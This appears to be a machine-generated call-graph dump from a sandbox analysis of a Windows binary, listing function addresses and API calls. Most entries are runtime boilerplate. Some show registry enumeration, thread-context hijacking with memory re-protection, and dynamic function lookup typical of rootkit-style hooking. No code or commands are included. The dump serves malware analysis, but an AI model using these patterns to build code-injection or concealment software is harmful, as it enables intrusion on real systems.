9181->9182 9183 1d29e8c3191 GetProcessHeap HeapFree 9182->9183 9184 1d29e8c3159 StrCmpW 9182->9184 9183->9180 9184->9183 9186 1d29e8c316e 9184->9186 9185 1d29e8c3554 12 API calls 9185->9186 9186->9183 9186->9185 9187 1d29e8c5cbc 9188 1d29e8c5cc3 9187->9188 9189 1d29e8c5cf0 VirtualProtect 9188->9189 9191 1d29e8c5c00 9188->9191 9190 1d29e8c5d19 GetLastError 9189->9190 9189->9191 9190->9191 8423 1d29e8cc9bc 8424 1d29e8cc9d5 8423->8424 8425 1d29e8cc9ed 8423->8425 8424->8425 8426 1d29e8cdb74 __free_lconv_mon 11 API calls 8424->8426 8426->8425 9192 1d29e8cfebc 9193 1d29e8cfec8 9192->9193 9194 1d29e8cfeef 9193->9194 9196 1d29e8d20ec 9193->9196 9197 1d29e8d20f1 9196->9197 9201 1d29e8d212c 9196->9201 9198 1d29e8d2112 DeleteCriticalSection 9197->9198 9199 1d29e8d2124 9197->9199 9198->9198 9198->9199 9200 1d29e8cdb74 __free_lconv_mon 11 API calls 9199->9200 9200->9201 9201->9193 8427 1d29e8d07b8 8428 1d29e8d07c3 8427->8428 8436 1d29e8d30b8 8428->8436 8449 1d29e8ccdcc EnterCriticalSection 8436->8449 9202 1d29e8d52b3 9205 1d29e8c97a4 9202->9205 9206 1d29e8c97ce 9205->9206 9207 1d29e8c97bc 9205->9207 9209 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9206->9209 9207->9206 9208 1d29e8c97c4 9207->9208 9211 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9208->9211 9214 1d29e8c97cc 9208->9214 9210 1d29e8c97d3 9209->9210 9212 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9210->9212 9210->9214 9213 1d29e8c97f3 9211->9213 9212->9214 9215 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9213->9215 9216 1d29e8c9800 9215->9216 9217 1d29e8ccad8 23 API calls 9216->9217 9218 1d29e8c9809 9217->9218 9219 1d29e8ccad8 23 API calls 9218->9219 9220 1d29e8c9815 9219->9220 8948 1d29e8c2334 GetProcessIdOfThread GetCurrentProcessId 8949 1d29e8c235f CreateFileW 8948->8949 8950 1d29e8c23da 8948->8950 8949->8950 8951 1d29e8c2393 WriteFile ReadFile CloseHandle 8949->8951 8951->8950 7916 1d29e8c9435 7917 1d29e8c9448 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7916->7917 7918 1d29e8c9539 7917->7918 7919 1d29e8c9504 RtlUnwindEx 7917->7919 7919->7917 9221 1d29e8d50cf 9222 1d29e8d5152 9221->9222 9223 1d29e8d50e7 9221->9223 9223->9222 9224 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9223->9224 9225 1d29e8d5134 9224->9225 9226 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9225->9226 9227 1d29e8d5149 9226->9227 9228 1d29e8ccad8 23 API calls 9227->9228 9228->9222 9229 1d29e8d1ed0 9230 1d29e8cf0c0 69 API calls 9229->9230 9231 1d29e8d1ed9 9230->9231 8952 1d29e8c7f4c 8953 1d29e8c7f70 __scrt_acquire_startup_lock 8952->8953 8954 1d29e8cbd15 8953->8954 8955 1d29e8cd3d0 __free_lconv_mon 11 API calls 8953->8955 8956 1d29e8cbd3e 8955->8956 9232 1d29e8cdecc 9233 1d29e8cdef1 9232->9233 9241 1d29e8cdf08 9232->9241 9234 1d29e8cdadc __free_lconv_mon 11 API calls 9233->9234 9235 1d29e8cdef6 9234->9235 9237 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 9235->9237 9236 1d29e8cdfc0 9238 1d29e8cc32c 11 API calls 9236->9238 9260 1d29e8cdf01 9237->9260 9239 1d29e8ce018 9238->9239 9240 1d29e8ce020 9239->9240 9249 1d29e8ce052 9239->9249 9243 1d29e8cdb74 __free_lconv_mon 11 API calls 9240->9243 9241->9236 9246 1d29e8cdf98 9241->9246 9248 1d29e8cdf55 9241->9248 9264 1d29e8ce110 9241->9264 9245 1d29e8ce027 9243->9245 9244 1d29e8ce0b1 9247 1d29e8cdb74 __free_lconv_mon 11 API calls 9244->9247 9250 1d29e8cdb74 __free_lconv_mon 11 API calls 9245->9250 9258 1d29e8cdf78 9245->9258 9251 1d29e8cdb74 __free_lconv_mon 11 API calls 9246->9251 9246->9258 9259 1d29e8ce0bc 9247->9259 9254 1d29e8cdb74 __free_lconv_mon 11 API calls 9248->9254 9248->9258 9249->9244 9261 1d29e8ce0f7 9249->9261 9286 1d29e8d1380 9249->9286 9250->9245 9251->9246 9252 1d29e8ce0d5 9257 1d29e8cdb74 __free_lconv_mon 11 API calls 9252->9257 9253 1d29e8cdb74 __free_lconv_mon 11 API calls 9253->9260 9254->9248 9256 1d29e8cdb74 __free_lconv_mon 11 API calls 9256->9259 9257->9260 9258->9253 9259->9252 9259->9256 9262 1d29e8cd9c0 _invalid_parameter_noinfo 17 API calls 9261->9262 9263 1d29e8ce10c 9262->9263 9265 1d29e8ce13e 9264->9265 9265->9265 9266 1d29e8cdafc _invalid_parameter_noinfo 11 API calls 9265->9266 9267 1d29e8ce189 9266->9267 9268 1d29e8d1380 49 API calls 9267->9268 9269 1d29e8ce1bf 9268->9269 9270 1d29e8cd9c0 _invalid_parameter_noinfo 17 API calls 9269->9270 9271 1d29e8ce293 9270->9271 9272 1d29e8ce5e4 23 API calls 9271->9272 9273 1d29e8ce376 9272->9273 9274 1d29e8cf9d8 5 API calls 9273->9274 9275 1d29e8ce3a1 9274->9275 9295 1d29e8cdbc4 9275->9295 9278 1d29e8ce43d 9279 1d29e8ce5e4 23 API calls 9278->9279 9280 1d29e8ce46d 9279->9280 9281 1d29e8cf9d8 5 API calls 9280->9281 9282 1d29e8ce496 9281->9282 9317 1d29e8cdd40 9282->9317 9285 1d29e8ce110 59 API calls 9289 1d29e8d139d 9286->9289 9287 1d29e8d13a2 9288 1d29e8cdadc __free_lconv_mon 11 API calls 9287->9288 9291 1d29e8d13b8 9287->9291 9294 1d29e8d13ac 9288->9294 9289->9287 9289->9291 9292 1d29e8d13ec 9289->9292 9290 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 9290->9291 9291->9249 9292->9291 9293 1d29e8cdadc __free_lconv_mon 11 API calls 9292->9293 9293->9294 9294->9290 9296 1d29e8cdbee 9295->9296 9297 1d29e8cdc12 9295->9297 9300 1d29e8cdbfd FindFirstFileExW 9296->9300 9302 1d29e8cdb74 __free_lconv_mon 11 API calls 9296->9302 9298 1d29e8cdc6c 9297->9298 9299 1d29e8cdc17 9297->9299 9301 1d29e8cf4ac MultiByteToWideChar 9298->9301 9299->9300 9303 1d29e8cdb74 __free_lconv_mon 11 API calls 9299->9303 9308 1d29e8cdc2c 9299->9308 9300->9278 9307 1d29e8cdc88 9301->9307 9302->9300 9303->9308 9304 1d29e8cce3c 12 API calls 9304->9300 9305 1d29e8cdc8f GetLastError 9309 1d29e8cda50 11 API calls 9305->9309 9306 1d29e8cdcca 9306->9300 9311 1d29e8cf4ac MultiByteToWideChar 9306->9311 9307->9305 9307->9306 9310 1d29e8cdcbd 9307->9310 9313 1d29e8cdb74 __free_lconv_mon 11 API calls 9307->9313 9308->9304 9312 1d29e8cdc9c 9309->9312 9314 1d29e8cce3c 12 API calls 9310->9314 9315 1d29e8cdd0e 9311->9315 9316 1d29e8cdadc __free_lconv_mon 11 API calls 9312->9316 9313->9310 9314->9306 9315->9300 9315->9305 9316->9300 9318 1d29e8cdd8e 9317->9318 9319 1d29e8cdd6a 9317->9319 9320 1d29e8cdde8 9318->9320 9321 1d29e8cdd94 9318->9321 9323 1d29e8cdb74 __free_lconv_mon 11 API calls 9319->9323 9328 1d29e8cdd79 9319->9328 9322 1d29e8cf53c WideCharToMultiByte 9320->9322 9324 1d29e8cdda9 9321->9324 9325 1d29e8cdb74 __free_lconv_mon 11 API calls 9321->9325 9321->9328 9331 1d29e8cde0c 9322->9331 9323->9328 9326 1d29e8cce3c 12 API calls 9324->9326 9325->9324 9326->9328 9327 1d29e8cde13 GetLastError 9330 1d29e8cda50 11 API calls 9327->9330 9328->9285 9329 1d29e8cde50 9329->9328 9333 1d29e8cf53c WideCharToMultiByte 9329->9333 9334 1d29e8cde20 9330->9334 9331->9327 9331->9329 9332 1d29e8cde44 9331->9332 9335 1d29e8cdb74 __free_lconv_mon 11 API calls 9331->9335 9336 1d29e8cce3c 12 API calls 9332->9336 9337 1d29e8cde9c 9333->9337 9338 1d29e8cdadc __free_lconv_mon 11 API calls 9334->9338 9335->9332 9336->9329 9337->9327 9337->9328 9338->9328 7533 1d29e8c1ac8 7540 1d29e8c1628 GetProcessHeap HeapAlloc 7533->7540 7535 1d29e8c1ad7 7536 1d29e8c1ade SleepEx 7535->7536 7539 1d29e8c1598 StrCmpIW StrCmpW 7535->7539 7591 1d29e8c18b4 7535->7591 7537 1d29e8c1628 50 API calls 7536->7537 7537->7535 7539->7535 7608 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7540->7608 7542 1d29e8c1650 7609 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7542->7609 7544 1d29e8c1658 7610 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7544->7610 7546 1d29e8c1661 7611 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7546->7611 7548 1d29e8c166a 7612 1d29e8c1268 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7548->7612 7550 1d29e8c1673 7613 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7550->7613 7552 1d29e8c167c 7614 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7552->7614 7554 1d29e8c1685 7615 1d29e8c1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 7554->7615 7556 1d29e8c168e RegOpenKeyExW 7557 1d29e8c16c0 RegOpenKeyExW 7556->7557 7558 1d29e8c18a6 7556->7558 7559 1d29e8c16ff RegOpenKeyExW 7557->7559 7560 1d29e8c16e9 7557->7560 7558->7535 7561 1d29e8c173a RegOpenKeyExW 7559->7561 7562 1d29e8c1723 7559->7562 7616 1d29e8c12bc RegQueryInfoKeyW 7560->7616 7566 1d29e8c175e 7561->7566 7567 1d29e8c1775 RegOpenKeyExW 7561->7567 7625 1d29e8c104c RegQueryInfoKeyW 7562->7625 7569 1d29e8c12bc 16 API calls 7566->7569 7570 1d29e8c17b0 RegOpenKeyExW 7567->7570 7571 1d29e8c1799 7567->7571 7572 1d29e8c176b RegCloseKey 7569->7572 7574 1d29e8c17eb RegOpenKeyExW 7570->7574 7575 1d29e8c17d4 7570->7575 7573 1d29e8c12bc 16 API calls 7571->7573 7572->7567 7578 1d29e8c17a6 RegCloseKey 7573->7578 7576 1d29e8c180f 7574->7576 7577 1d29e8c1826 RegOpenKeyExW 7574->7577 7579 1d29e8c12bc 16 API calls 7575->7579 7581 1d29e8c104c 6 API calls 7576->7581 7582 1d29e8c1861 RegOpenKeyExW 7577->7582 7583 1d29e8c184a 7577->7583 7578->7570 7580 1d29e8c17e1 RegCloseKey 7579->7580 7580->7574 7584 1d29e8c181c RegCloseKey 7581->7584 7586 1d29e8c189c RegCloseKey 7582->7586 7587 1d29e8c1885 7582->7587 7585 1d29e8c104c 6 API calls 7583->7585 7584->7577 7588 1d29e8c1857 RegCloseKey 7585->7588 7586->7558 7589 1d29e8c104c 6 API calls 7587->7589 7588->7582 7590 1d29e8c1892 RegCloseKey 7589->7590 7590->7586 7635 1d29e8c14a4 7591->7635 7608->7542 7609->7544 7610->7546 7611->7548 7612->7550 7613->7552 7614->7554 7615->7556 7617 1d29e8c148a RegCloseKey 7616->7617 7618 1d29e8c1327 GetProcessHeap HeapAlloc 7616->7618 7617->7559 7619 1d29e8c1476 GetProcessHeap HeapFree 7618->7619 7620 1d29e8c1352 RegEnumValueW 7618->7620 7619->7617 7621 1d29e8c13a5 7620->7621 7621->7619 7621->7620 7623 1d29e8c141e lstrlenW GetProcessHeap HeapAlloc StrCpyW 7621->7623 7624 1d29e8c13d3 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7621->7624 7630 1d29e8c152c 7621->7630 7623->7621 7624->7623 7626 1d29e8c11b5 RegCloseKey 7625->7626 7628 1d29e8c10bf 7625->7628 7626->7561 7627 1d29e8c10cf RegEnumValueW 7627->7628 7628->7626 7628->7627 7629 1d29e8c114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7628->7629 7629->7628 7631 1d29e8c1546 7630->7631 7632 1d29e8c157c 7630->7632 7631->7632 7633 1d29e8c155d StrCmpIW 7631->7633 7634 1d29e8c1565 StrCmpW 7631->7634 7632->7621 7633->7631 7634->7631 7636 1d29e8c14e1 GetProcessHeap HeapFree GetProcessHeap HeapFree 7635->7636 7637 1d29e8c14c1 GetProcessHeap HeapFree 7635->7637 7637->7636 7637->7637 9339 1d29e8d52c9 9340 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9339->9340 9341 1d29e8d52d7 9340->9341 9342 1d29e8d52e2 9341->9342 9343 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 9341->9343 9343->9342 8450 1d29e8d41c8 8451 1d29e8d41df 8450->8451 8452 1d29e8d41d9 CloseHandle 8450->8452 8452->8451 7920 1d29e8cb444 7921 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7920->7921 7922 1d29e8cb479 7921->7922 7923 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7922->7923 7924 1d29e8cb487 __except_validate_context_record 7923->7924 7925 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7924->7925 7926 1d29e8cb4cb 7925->7926 7927 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7926->7927 7928 1d29e8cb4d4 7927->7928 7929 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7928->7929 7930 1d29e8cb4dd 7929->7930 7943 1d29e8ca084 7930->7943 7933 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7934 1d29e8cb50d __CxxCallCatchBlock 7933->7934 7935 1d29e8ca0c0 __CxxCallCatchBlock 9 API calls 7934->7935 7939 1d29e8cb5be 7935->7939 7936 1d29e8cb5e7 __CxxCallCatchBlock 7937 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7936->7937 7938 1d29e8cb5fa 7937->7938 7940 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7938->7940 7939->7936 7941 1d29e8c9750 __CxxCallCatchBlock 9 API calls 7939->7941 7942 1d29e8cb603 7940->7942 7941->7936 7944 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7943->7944 7945 1d29e8ca095 7944->7945 7946 1d29e8ca0a0 7945->7946 7947 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7945->7947 7948 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 7946->7948 7947->7946 7949 1d29e8ca0b1 7948->7949 7949->7933 7949->7934 9344 1d29e8c28c4 9346 1d29e8c290a 9344->9346 9345 1d29e8c2970 9346->9345 9347 1d29e8c3c74 StrCmpNIW 9346->9347 9347->9346 7950 1d29e8c7c60 7951 1d29e8c7c81 7950->7951 7952 1d29e8c7c7c 7950->7952 7954 1d29e8c7d90 7952->7954 7955 1d29e8c7e27 7954->7955 7956 1d29e8c7db3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7954->7956 7955->7951 7956->7955 7957 1d29e8cfc60 GetProcessHeap 8453 1d29e8d39db 8454 1d29e8d3c80 8453->8454 8455 1d29e8d3a1b 8453->8455 8456 1d29e8d3c76 8454->8456 8460 1d29e8d4790 _log10_special 20 API calls 8454->8460 8455->8454 8457 1d29e8d3c62 8455->8457 8458 1d29e8d3a4f 8455->8458 8461 1d29e8d4790 8457->8461 8460->8456 8464 1d29e8d47b0 8461->8464 8465 1d29e8d47ca 8464->8465 8466 1d29e8d47ab 8465->8466 8468 1d29e8d45f0 8465->8468 8466->8456 8469 1d29e8d4630 _log10_special 8468->8469 8472 1d29e8d469c _log10_special 8469->8472 8479 1d29e8d48b0 8469->8479 8471 1d29e8d46d9 8486 1d29e8d4be0 8471->8486 8472->8471 8473 1d29e8d46a9 8472->8473 8482 1d29e8d44cc 8473->8482 8476 1d29e8d46d7 _log10_special 8477 1d29e8c7d70 _log10_special 8 API calls 8476->8477 8478 1d29e8d4701 8477->8478 8478->8466 8492 1d29e8d48d8 8479->8492 8483 1d29e8d4510 _log10_special 8482->8483 8484 1d29e8d4525 8483->8484 8485 1d29e8d4be0 _log10_special 11 API calls 8483->8485 8484->8476 8485->8484 8487 1d29e8d4c00 8486->8487 8488 1d29e8d4be9 8486->8488 8489 1d29e8cdadc __free_lconv_mon 11 API calls 8487->8489 8490 1d29e8d4bf8 8488->8490 8491 1d29e8cdadc __free_lconv_mon 11 API calls 8488->8491 8489->8490 8490->8476 8491->8490 8493 1d29e8d4917 _raise_exc _clrfp 8492->8493 8494 1d29e8d4b2c RaiseException 8493->8494 8495 1d29e8d48d2 8494->8495 8495->8472 9348 1d29e8c2adc 9350 1d29e8c2b39 9348->9350 9349 1d29e8c2b54 9350->9349 9351 1d29e8c34ac 3 API calls 9350->9351 9351->9349 7958 1d29e8c2a58 7960 1d29e8c2aac 7958->7960 7959 1d29e8c2ac7 7960->7959 7962 1d29e8c33f8 7960->7962 7963 1d29e8c348e 7962->7963 7965 1d29e8c341d 7962->7965 7963->7959 7964 1d29e8c3c74 StrCmpNIW 7964->7965 7965->7963 7965->7964 7966 1d29e8c1d0c StrCmpIW StrCmpW 7965->7966 7966->7965 8957 1d29e8cd558 8958 1d29e8cd568 8957->8958 8959 1d29e8cd3d0 __free_lconv_mon 11 API calls 8958->8959 8960 1d29e8cd573 __vcrt_uninitialize_ptd 8958->8960 8959->8960 9361 1d29e8d18d3 9362 1d29e8d18e0 9361->9362 9363 1d29e8d18f5 9362->9363 9364 1d29e8d190e 9362->9364 9365 1d29e8cdadc __free_lconv_mon 11 API calls 9363->9365 9368 1d29e8ce5e4 23 API calls 9364->9368 9369 1d29e8d1905 9364->9369 9366 1d29e8d18fa 9365->9366 9367 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 9366->9367 9367->9369 9368->9369 9370 1d29e8c60d3 9371 1d29e8c60e0 9370->9371 9372 1d29e8c60ec GetThreadContext 9371->9372 9373 1d29e8c624a 9371->9373 9372->9373 9374 1d29e8c6112 9372->9374 9375 1d29e8c632e 9373->9375 9376 1d29e8c6271 VirtualProtect FlushInstructionCache 9373->9376 9374->9373 9379 1d29e8c6139 9374->9379 9377 1d29e8c634e 9375->9377 9381 1d29e8c4810 VirtualFree 9375->9381 9376->9373 9378 1d29e8c5220 3 API calls 9377->9378 9385 1d29e8c6353 9378->9385 9380 1d29e8c61bd 9379->9380 9382 1d29e8c6196 SetThreadContext 9379->9382 9381->9377 9382->9380 9383 1d29e8c63a7 9386 1d29e8c7d70 _log10_special 8 API calls 9383->9386 9384 1d29e8c6367 ResumeThread 9384->9385 9385->9383 9385->9384 9387 1d29e8c63ef 9386->9387 8496 1d29e8cb7d4 8501 1d29e8cb707 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 8496->8501 8497 1d29e8cb7fb 8498 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8497->8498 8499 1d29e8cb800 8498->8499 8500 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8499->8500 8503 1d29e8cb80b __FrameHandler3::GetHandlerSearchState 8499->8503 8500->8503 8501->8497 8502 1d29e8ca114 9 API calls Is_bad_exception_allowed 8501->8502 8501->8503 8504 1d29e8ca13c __FrameHandler3::FrameUnwindToEmptyState 9 API calls 8501->8504 8502->8501 8504->8501 7967 1d29e8d0070 7968 1d29e8d00a0 7967->7968 7971 1d29e8d00c7 7967->7971 7969 1d29e8cd3d0 __free_lconv_mon 11 API calls 7968->7969 7968->7971 7973 1d29e8d00b4 7968->7973 7969->7973 7970 1d29e8d019c 7974 1d29e8d02d0 7970->7974 7975 1d29e8d01ca 7970->7975 7987 1d29e8d0203 7970->7987 7971->7970 7990 1d29e8ccdcc EnterCriticalSection 7971->7990 7973->7971 7976 1d29e8d0149 7973->7976 7984 1d29e8d0104 7973->7984 7980 1d29e8d02dd 7974->7980 7992 1d29e8cce20 LeaveCriticalSection 7974->7992 7983 1d29e8cd258 _invalid_parameter_noinfo 23 API calls 7975->7983 7975->7987 7977 1d29e8cdadc __free_lconv_mon 11 API calls 7976->7977 7981 1d29e8d014e 7977->7981 7982 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 7981->7982 7982->7984 7985 1d29e8d01f3 7983->7985 7986 1d29e8cd258 _invalid_parameter_noinfo 23 API calls 7985->7986 7986->7987 7988 1d29e8d0261 7987->7988 7991 1d29e8cce20 LeaveCriticalSection 7987->7991 7989 1d29e8cd258 23 API calls _invalid_parameter_noinfo 7988->7989 7989->7988 7993 1d29e8d1470 7994 1d29e8d148f 7993->7994 7995 1d29e8d1508 7994->7995 7998 1d29e8d149f 7994->7998 8001 1d29e8c8630 7995->8001 7999 1d29e8c7d70 _log10_special 8 API calls 7998->7999 8000 1d29e8d14fe 7999->8000 8004 1d29e8c8644 IsProcessorFeaturePresent 8001->8004 8005 1d29e8c865b 8004->8005 8010 1d29e8c86e0 RtlCaptureContext RtlLookupFunctionEntry 8005->8010 8011 1d29e8c8710 RtlVirtualUnwind 8010->8011 8012 1d29e8c866f 8010->8012 8011->8012 8013 1d29e8c8528 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8012->8013 8961 1d29e8d0f70 8962 1d29e8d0f9d 8961->8962 8963 1d29e8cdadc __free_lconv_mon 11 API calls 8962->8963 8968 1d29e8d0fb2 8962->8968 8964 1d29e8d0fa7 8963->8964 8965 1d29e8cd9a0 _invalid_parameter_noinfo 49 API calls 8964->8965 8965->8968 8966 1d29e8c7d70 _log10_special 8 API calls 8967 1d29e8d1370 8966->8967 8968->8966 9388 1d29e8c3ee9 9389 1d29e8c3e36 9388->9389 9390 1d29e8c3e86 VirtualQuery 9389->9390 9391 1d29e8c3eba VirtualAlloc 9389->9391 9393 1d29e8c3ea0 9389->9393 9390->9389 9390->9393 9392 1d29e8c3eeb GetLastError 9391->9392 9391->9393 9392->9389 9392->9393 9394 1d29e8c5ce9 9395 1d29e8c5cf0 VirtualProtect 9394->9395 9396 1d29e8c5d19 GetLastError 9395->9396 9397 1d29e8c5c00 9395->9397 9396->9397 8014 1d29e8c5664 8015 1d29e8c566a 8014->8015 8026 1d29e8c7ca0 8015->8026 8019 1d29e8c56ce 8021 1d29e8c5767 8021->8019 8023 1d29e8c58ed 8021->8023 8039 1d29e8c7870 8021->8039 8022 1d29e8c59eb 8023->8022 8024 1d29e8c5a67 VirtualProtect 8023->8024 8024->8019 8025 1d29e8c5a93 GetLastError 8024->8025 8025->8019 8027 1d29e8c7cab 8026->8027 8028 1d29e8c56ad 8027->8028 8029 1d29e8cbc8c _invalid_parameter_noinfo 2 API calls 8027->8029 8030 1d29e8c7cca 8027->8030 8028->8019 8035 1d29e8c40f0 8028->8035 8029->8027 8031 1d29e8c7cd5 8030->8031 8045 1d29e8c84cc 8030->8045 8049 1d29e8c84ec 8031->8049 8036 1d29e8c410d 8035->8036 8038 1d29e8c417c 8036->8038 8058 1d29e8c4360 8036->8058 8038->8021 8040 1d29e8c78b7 8039->8040 8083 1d29e8c7640 8040->8083 8043 1d29e8c7d70 _log10_special 8 API calls 8044 1d29e8c78e1 8043->8044 8044->8021 8046 1d29e8c84da std::bad_alloc::bad_alloc 8045->8046 8053 1d29e8c98d0 8046->8053 8048 1d29e8c84eb 8050 1d29e8c84fa std::bad_alloc::bad_alloc 8049->8050 8051 1d29e8c98d0 Concurrency::cancel_current_task 2 API calls 8050->8051 8052 1d29e8c7cdb 8051->8052 8054 1d29e8c98ef 8053->8054 8055 1d29e8c993a RaiseException 8054->8055 8056 1d29e8c9918 RtlPcToFileHeader 8054->8056 8055->8048 8057 1d29e8c9930 8056->8057 8057->8055 8059 1d29e8c43a7 8058->8059 8060 1d29e8c4384 8058->8060 8066 1d29e8c43dd 8059->8066 8078 1d29e8c3f40 8059->8078 8060->8059 8072 1d29e8c3e10 8060->8072 8063 1d29e8c3f40 2 API calls 8067 1d29e8c440d 8063->8067 8064 1d29e8c4443 8065 1d29e8c445f 8064->8065 8069 1d29e8c3e10 3 API calls 8064->8069 8070 1d29e8c447b 8065->8070 8071 1d29e8c3f40 2 API calls 8065->8071 8066->8063 8066->8067 8067->8064 8068 1d29e8c3e10 3 API calls 8067->8068 8068->8064 8069->8065 8070->8038 8071->8070 8075 1d29e8c3e31 8072->8075 8073 1d29e8c3ea0 8073->8059 8074 1d29e8c3e86 VirtualQuery 8074->8073 8074->8075 8075->8073 8075->8074 8076 1d29e8c3eba VirtualAlloc 8075->8076 8076->8073 8077 1d29e8c3eeb GetLastError 8076->8077 8077->8073 8077->8075 8081 1d29e8c3f58 8078->8081 8079 1d29e8c3fc7 8079->8066 8080 1d29e8c3fad VirtualQuery 8080->8079 8080->8081 8081->8079 8081->8080 8082 1d29e8c4012 GetLastError 8081->8082 8082->8079 8082->8081 8084 1d29e8c765b 8083->8084 8085 1d29e8c767f 8084->8085 8086 1d29e8c7671 SetLastError 8084->8086 8085->8043 8086->8085 8087 1d29e8c9664 8094 1d29e8c9bac 8087->8094 8090 1d29e8c9671 8095 1d29e8c9bb4 8094->8095 8097 1d29e8c9be5 8095->8097 8098 1d29e8c966d 8095->8098 8111 1d29e8ca470 8095->8111 8099 1d29e8c9bf4 __vcrt_uninitialize_locks DeleteCriticalSection 8097->8099 8098->8090 8100 1d29e8c9b40 8098->8100 8099->8098 8116 1d29e8ca344 8100->8116 8112 1d29e8ca1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 8111->8112 8113 1d29e8ca4a6 8112->8113 8114 1d29e8ca4bb InitializeCriticalSectionAndSpinCount 8113->8114 8115 1d29e8ca4b0 8113->8115 8114->8115 8115->8095 8117 1d29e8ca1f4 __vcrt_InitializeCriticalSectionEx 5 API calls 8116->8117 8118 1d29e8ca369 TlsAlloc 8117->8118 8978 1d29e8d5165 8979 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8978->8979 8980 1d29e8d517d 8979->8980 8981 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8980->8981 8982 1d29e8d5198 8981->8982 8983 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8982->8983 8984 1d29e8d51ac 8983->8984 8985 1d29e8c9a64 __CxxCallCatchBlock 9 API calls 8984->8985 8986 1d29e8d51ee 8985->8986 8987 1d29e8cc964 8990 1d29e8cc714 8987->8990 8997 1d29e8cc6dc 8990->8997 8995 1d29e8cc698 11 API calls 8996 1d29e8cc747 8995->8996 8998 1d29e8cc6f1 8997->8998 8999 1d29e8cc6ec 8997->8999 9001 1d29e8cc6f8 8998->9001 9000 1d29e8cc698 11 API calls 8999->9000 9000->8998 9002 1d29e8cc70d 9001->9002 9003 1d29e8cc708 9001->9003 9002->8995 9004 1d29e8cc698 11 API calls 9003->9004 9004->9002 8120 1d29e8d5081 __scrt_dllmain_exception_filter 8121 1d29e8cfe80 8132 1d29e8ccdcc EnterCriticalSection 8121->8132 8511 1d29e8cc9fc 8512 1d29e8cdb74 __free_lconv_mon 11 API calls 8511->8512 8513 1d29e8cca0c 8512->8513 8514 1d29e8cdb74 __free_lconv_mon 11 API calls 8513->8514 8515 1d29e8cca20 8514->8515 8516 1d29e8cdb74 __free_lconv_mon 11 API calls 8515->8516 8517 1d29e8cca34 8516->8517 8518 1d29e8cdb74 __free_lconv_mon 11 API calls 8517->8518 8519 1d29e8cca48 8518->8519 9005 1d29e8c597d 9007 1d29e8c5984 9005->9007 9006 1d29e8c59eb 9007->9006 9008 1d29e8c5a67 VirtualProtect 9007->9008 9009 1d29e8c5a93 GetLastError 9008->9009 9010 1d29e8c5aa1 9008->9010 9009->9010 8520 1d29e8c23f8 8522 1d29e8c2476 8520->8522 8521 1d29e8c25b2 8522->8521 8523 1d29e8c24db GetFileType 8522->8523 8524 1d29e8c24fd 8523->8524 8525 1d29e8c24e9 StrCpyW 8523->8525 8531 1d29e8c19d8 GetFinalPathNameByHandleW 8524->8531 8529 1d29e8c250a 8525->8529 8527 1d29e8c3c74 StrCmpNIW 8527->8529 8529->8521 8529->8527 8536 1d29e8c330c StrCmpIW 8529->8536 8540 1d29e8c1cd8 8529->8540 8532 1d29e8c1a41 8531->8532 8533 1d29e8c1a02 StrCmpNIW 8531->8533 8532->8529 8533->8532 8534 1d29e8c1a1c lstrlenW 8533->8534 8534->8532 8535 1d29e8c1a2e StrCpyW 8534->8535 8535->8532 8537 1d29e8c333e StrCpyW StrCatW 8536->8537 8538 1d29e8c3355 PathCombineW 8536->8538 8539 1d29e8c335e 8537->8539 8538->8539 8539->8529 8541 1d29e8c1cef 8540->8541 8542 1d29e8c1cf8 8540->8542 8543 1d29e8c152c 2 API calls 8541->8543 8542->8529 8543->8542 8544 1d29e8c2bf4 8545 1d29e8c2c65 8544->8545 8546 1d29e8c2f88 8545->8546 8547 1d29e8c2c91 GetModuleHandleA 8545->8547 8548 1d29e8c2ca3 GetProcAddress 8547->8548 8549 1d29e8c2cb5 8547->8549 8548->8549 8549->8546 8550 1d29e8c2cdc StrCmpNIW 8549->8550 8550->8546 8554 1d29e8c2d01 8550->8554 8551 1d29e8c1934 6 API calls 8551->8554 8552 1d29e8c2e13 lstrlenW 8552->8554 8553 1d29e8c2ebd lstrlenW 8553->8554 8554->8546 8554->8551 8554->8552 8554->8553 8555 1d29e8c1c00 